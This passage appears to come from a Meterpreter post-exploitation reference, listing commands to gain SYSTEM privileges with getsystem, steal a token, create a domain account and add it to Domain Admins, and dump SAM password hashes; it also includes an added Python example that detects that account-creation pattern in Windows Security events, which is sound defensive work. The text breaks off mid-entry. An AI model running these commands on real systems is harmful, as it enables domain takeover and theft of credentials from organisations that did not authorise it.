Meterpreter Post Exploitation Commands

Elevate your permissions on Windows-based systems using Meterpreter:

meterpreter > use priv
meterpreter > getsystem

Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:

meterpreter > ps

meterpreter > steal_token 1784
meterpreter > shell

C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
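
From the monitoring side, the two net commands above leave Security log entries on a domain controller: event 4720 (user account created) followed by event 4728 (member added to a security-enabled global group). The following is an added detection example, not code from the book; it assumes the events have already been exported and flattened into dictionaries, and the function name, sample events and 10-minute window are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from a real log), flattened to fields that
# Windows records for Security event IDs 4720 and 4728.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-01-10T14:02:11", "SubjectUserName": "da-jsmith",
     "TargetUserName": "metasploit", "TargetSid": "S-1-5-21-1111-2222-3333-1605"},
    {"EventID": 4728, "TimeCreated": "2024-01-10T14:02:19", "SubjectUserName": "da-jsmith",
     "TargetUserName": "Domain Admins", "MemberSid": "S-1-5-21-1111-2222-3333-1605"},
    {"EventID": 4720, "TimeCreated": "2024-01-10T09:00:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "new.hire", "TargetSid": "S-1-5-21-1111-2222-3333-1604"},
    {"EventID": 4728, "TimeCreated": "2024-01-10T09:05:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "Sales Staff", "MemberSid": "S-1-5-21-1111-2222-3333-1604"},
]

PRIVILEGED_GROUPS = {"domain admins"}  # assumption: extend with other global groups you protect


def find_new_account_escalations(events, window=timedelta(minutes=10)):
    """Return alerts where an account created (4720) is added to a privileged
    global group (4728) within `window` of its creation."""
    created = {}  # account SID -> (creation time, account name, creator)
    alerts = []
    # ISO 8601 timestamps sort correctly as strings
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ts, ev["TargetUserName"], ev["SubjectUserName"])
        elif ev["EventID"] == 4728 and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            # 4728 identifies the added member by SID, so correlate on SID, not name
            hit = created.get(ev["MemberSid"])
            if hit and ts - hit[0] <= window:
                alerts.append({
                    "account": hit[1],
                    "group": ev["TargetUserName"],
                    "created_by": hit[2],
                    "added_by": ev["SubjectUserName"],
                    "seconds_after_creation": int((ts - hit[0]).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_account_escalations(SAMPLE_EVENTS):
        print(alert)
```
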

Dump password hashes from the SAM database:

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump

Note

On Win2k8 you may need to migrate to a process that is running as SYSTEM if getsystem and hashdump throw exceptions.

Automigrate to a separate process:

meterpreter ...
